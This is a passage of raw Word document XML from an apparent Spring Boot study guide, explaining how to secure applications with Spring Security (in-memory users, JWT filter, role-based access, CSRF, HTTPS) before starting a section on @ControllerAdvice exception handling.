      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to provide security to spring boot applications</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="613"/>
    </w:p>
    <w:p w14:paraId="359E12B7" w14:textId="45D04E53" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB"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provide security to a Spring Boot application, you can integrate </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is a powerful and customizable authentication and access control framework. Below are the steps to add security features such as authentication, authorization, and CSRF protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C40C7C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D36FC">
          <v:rect id="_x0000_i2577" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3CFA3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Add Spring Security Dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A577FB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your pom.xml (Maven) or build.gradle (Gradle), add the Spring Security dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CBA61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Maven:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AF77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7A8B3D9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AC66E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security&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398F90F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53B982E9"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Gradle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE018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lementation 'org.springframework.boot:spring-boot-starter-security'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46153FF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3475F">
          <v:rect id="_x0000_i2578" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38440667"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Basic Authentication Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B67A2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Basic Security Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701C0B6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7EEF57C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builders.HttpSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0809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EnableWebSecurity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324FE6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WebSecurityConfigurerAdapter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E46DD7A" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FAB65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D719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7ADF00B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582B6D35" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="150966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4ADBA4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37CF183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1EE0F6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375F9A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ntMatchers("/public/**").permitAll()  // Allow access to public endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A79C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          // Secure all other endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2153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F8E68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                  // Enable form-based login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555BB1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9A403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42B40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A64BCF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5B2700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3601F1">
          <v:rect id="_x0000_i2579" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="197F9E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In-Memory Authentication (for Testing/Development)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE2CBB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development or testing purposes, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in-memory authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to quickly set up users and roles without requiring a database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAE9A0D"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758CBC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148D55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0B48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authentication.builders.AuthenticationManagerBuilder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F098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1D07E33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52A41FD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memory.InMemoryUserDetailsManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D66BF7D" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69CD21A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D9219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68E574A9" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B9552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203B5B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AuthenticationManagerBuilder auth) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13602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inMemoryAuthentication()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36FC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user").password("{noop}password").roles("USER")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7D63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17683A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admin").password("{noop}admin").roles("ADMIN");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149C0F5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0552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426B8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noop is a password encoder indicating plain text for development purposes (not recommended in production).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C24E7D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5731B">
          <v:rect id="_x0000_i2580" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDF51B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Custom Authentication Provider (Database or Custom Logic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184DAF5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need to authenticate users from a database or any other source, you can define a custom authentication provider.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774BA33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BC191A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3BFDACA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D650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71CBB4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2ED6E3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provisioning.InMemoryUserDetailsManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E21D56" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="718C276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8D1BA3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E0E729" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F10BEF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607A4CD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DetailsService userDetailsService() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE1AD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nMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D9C8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nager.createUser(User.withUsername("user").password("{noop}password").roles("USER").build());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ED657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anager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B2C7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C603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7DAA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connect to a real database, you would implement UserDetailsService to load users from your database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BD51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DDD0C">
          <v:rect id="_x0000_i2581" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB0204"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JWT Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6489168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token-based authentication, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JWT (JSON Web Token)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a popular choice. You would typically use JWT in combination with Spring Security to secure your REST API endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A318F3B"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JWT Authentication Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50BCF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web.authentication.UsernamePasswordAuthenticationFilter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666F787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context.SecurityContextHolder;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6E959F" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766EEDC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JwtAuthenticationFilter extends UsernamePasswordAuthenticationFilter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A485D2" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AAE887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String jwtSecret = "your-secret-key";  // Use a secure key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B5A8B4" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1815BD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15216AC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Authentication attemptAuthentication(HttpServletRequest request, HttpServletResponse response) throws AuthenticationException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0B180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token = request.getHeader("Authorization");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA6CC4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token != null &amp;&amp; token.startsWith("Bearer ")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF73E3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jwt = token.substring(7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571ACB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se JWT and authenticate the user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F624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laims claims = Jwts.parser().setSigningKey(jwtSecret).parseClaimsJws(jwt).getBody();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E7542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name = claims.getSubject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F935F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trieve user details and create authentication object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C5EE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Details userDetails = userDetailsService.loadUserByUsername(username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5C9B5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namePasswordAuthenticationToken(userDetails, null, userDetails.getAuthorities());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC1355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1277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uper.attemptAuthentication(request, response);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51576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BB4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83FFA5"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261A81">
          <v:rect id="_x0000_i2582" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF35A4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ole-based Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDBEB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llows you to easily apply role-based access control for different parts of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED4481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00DE0D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61BD44E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35086DD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1F69B675" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35895D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1D7BD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7C935C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3C581F5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1BB6034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admin/**").hasRole("ADMIN")    // Access restricted to users with ADMIN role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A86BA6"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user/**").hasRole("USER")      // Access restricted to users with USER role</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483683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6E5697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0B0D53D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1956A63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C3271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27017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3BE86">
          <v:rect id="_x0000_i2583" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41702FF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CSRF Protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ECC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By default, Spring Security enables </w:t>
      </w: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For REST APIs (especially stateless applications), you may disable CSRF protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E572A3"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D6B991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43DC612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788789DA" w14:textId="77777777" w:rsidR="00A174AB" w:rsidRPr="00D774B4" w:rsidRDefault="00A174AB" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C05FF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92F470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15C584E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http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5588983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srf().disable()  // Disable CSRF for stateless APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744356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5658AB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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B2AEC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3BE7F7A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D13FEE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26EA3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0F7AA">
          <v:rect id="_x0000_i2584" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F3207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HTTPS Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48310D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enforce HTTPS (secure communication), you can configure Spring Boot to use SSL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDA48A2"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2129E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pplication.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C51151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443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA44B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classpath:keystore.jks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FF0BA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password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F6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Type=JKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35418C6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Alias=tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB499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you have a valid SSL certificate and keystore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61791DAD"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A1E8F">
          <v:rect id="_x0000_i2585" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7451C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asic Authorization Header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7260F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configure Spring Security to require HTTP Basic Authentication or use a custom header for token-based security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FFA3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722CF7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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7D8FA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tected void configure(HttpSecurity http) throws Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FCAC8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0C74372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17480C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4D7E03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7660D1F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secure/**").authenticated();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63550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C0FFC6"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19B5">
          <v:rect id="_x0000_i2586" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="032124E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Security Features in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299065F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entication:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Basic, Form-based, JWT, OAuth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A47E3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orization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Role-based access control using @PreAuthorize or @Secured annotations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788BBBE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cure Endpoints:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use HttpSecurity to secure endpoints based on roles or permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B493A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ustom Filters:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add custom authentication filters like JWT token filter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6190C4D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xml:space="preserve"> Disabled or enabled based on your application’s nature (stateless vs stateful).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBF97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w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Configure SSL to enforce secure communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FD4AA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re the common ways to provide security in a Spring Boot application. Spring Security is highly customizable and can be tailored to meet various application security needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CFC6A8" w14:textId="4282CEF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587" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="469A28A0" w14:textId="740EF55A" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00B95F49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="614" w:name="_Toc197867828"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is @ControllerAdvice in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="00EA2925" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="614"/>
    </w:p>
    <w:p w14:paraId="731251D2" w14:textId="42C96B8C" w:rsidR="00DB7207" w:rsidRPr="00D774B4" w:rsidRDefault="00DB7207"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is a specialized annotation in Spring used to handle exceptions across the whole application in one global handling mechanism. It is used to define </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global exception handlers</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bind certain model attributes</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or even apply </w:t>
      </w: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to all controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D9DE86"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 about @ControllerAdvice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613A909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p>
    <w:p w14:paraId="1ECB0AB7"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allows you to handle exceptions globally for all controllers in the application, eliminating the need for repetitive exception handling logic in each individual controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E66D7FC"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define @ExceptionHandler methods within @ControllerAdvice to catch specific exceptions or all exceptions and return appropriate responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A78BF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inding Model Attributes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055D531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can be used to add common attributes to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Model</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which will be available to all controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68498912"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 for Controllers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C7112"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You can also apply </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>global model attribut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global binding</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for every request that passes through controllers in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262AB13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argeted for Controller Layer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDD06C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meant for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller-related functionality</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like exception handling or adding global data for views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105A204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C5D7E">
          <v:rect id="_x0000_i2588" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C94A2F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Advice Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D153B"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Global Exception Handling Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B644C2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61C963B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ui.Model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0602E8C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38A9D65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ExceptionHandler;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6690A79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567A197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ponseStatus;</w:t>
      </w:r>
    </w:p>
